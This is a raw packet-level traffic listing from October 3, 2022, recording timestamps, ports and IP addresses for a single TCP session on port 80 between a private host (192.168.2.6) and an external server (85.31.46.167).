Oct 3, 2022 17:42:20.789984941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789999008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790010929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790024996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790040016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790046930 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790066957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790091038 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790093899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790119886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790132046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790139914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790150881 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790160894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790185928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790186882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790206909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790219069 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790235043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790258884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790262938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790288925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790291071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790314913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790317059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790334940 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790344954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790364027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790371895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790390015 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790402889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790426970 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790431023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790456057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790457964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790484905 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790486097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790517092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790519953 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790544033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790558100 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790570974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790592909 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790596008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790615082 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790622950 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790642023 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790654898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790673971 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790683985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790703058 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790712118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790728092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790738106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790761948 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790766001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790783882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790793896 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790816069 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790819883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790843964 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790848017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790887117 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790894985 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790911913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790920019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790942907 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790961981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.790982962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.790987015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.791013956 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.791014910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.791042089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.791044950 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.791071892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.791075945 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.791096926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.791112900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.791161060 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.805244923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.805275917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.805318117 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.805358887 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818226099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818250895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818269014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818286896 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818305016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818312883 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818320990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818340063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818351030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818351030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818357944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818378925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818384886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818398952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818417072 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818418026 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818437099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818439960 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818460941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818474054 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818489075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818491936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818511963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818515062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818531990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818531990 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818551064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818552017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818569899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818572998 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818589926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818595886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818608999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818614006 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818629026 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818641901 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818646908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818665981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818686962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818690062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818711996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818713903 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818720102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818734884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818739891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818758011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818768978 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818774939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818793058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818794012 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818810940 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818814993 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818829060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818835020 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818846941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818856001 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818866014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818896055 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818902969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818902969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818916082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818933010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818938971 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818953037 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818969011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818969965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.818980932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.818989992 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819014072 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819015980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819024086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819032907 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819035053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819052935 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819070101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819073915 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819088936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819097996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819107056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819124937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819133043 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819143057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819155931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819160938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819179058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819180965 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819196939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819205046 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819216013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819224119 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819235086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819245100 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819253922 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819271088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819272041 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819288969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819293022 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819307089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819313049 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819325924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819339037 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819344044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819365978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819379091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819385052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819402933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819413900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819427013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819428921 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819444895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819458008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819466114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819484949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819487095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.819506884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.819525957 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820178032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820198059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820228100 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820238113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820245028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820246935 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820254087 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820255995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820275068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820288897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820293903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820312977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820317030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820331097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820348978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820353985 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820367098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820374966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820385933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820396900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820404053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820422888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820422888 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820441008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820442915 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820460081 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820465088 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820477962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820486069 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820497036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820508957 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820516109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820530891 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820533991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820553064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820565939 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820570946 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820579052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820590973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820605993 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820610046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820628881 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820638895 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820647955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820660114 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820667028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820683956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820694923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820702076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820717096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820719957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820740938 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820744991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820763111 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820765972 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820780993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820787907 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820800066 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820808887 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820817947 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820830107 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820836067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820853949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820854902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820874929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820882082 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820894957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820910931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820911884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820925951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820931911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820954084 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820955038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820964098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.820975065 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.820983887 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.821005106 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.821033955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.832321882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.832355022 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.832375050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.832391977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.832417011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.832467079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.861176014 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.861798048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.888309002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.888343096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.888361931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.888473988 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.888540983 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.888912916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.888936996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.888958931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.888976097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.888979912 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.888995886 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889008045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889009953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889024019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889045000 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889049053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889069080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889071941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889087915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889106989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889107943 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889122963 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889126062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889149904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889154911 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889163017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889182091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889194012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889210939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889230013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889247894 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889247894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889261961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889261961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889269114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889287949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889305115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889307976 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889322996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889342070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889343023 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889359951 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889363050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889379025 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889394045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889396906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889415979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889427900 CEST	49711	80	192.168.2.6	85.31.46.167
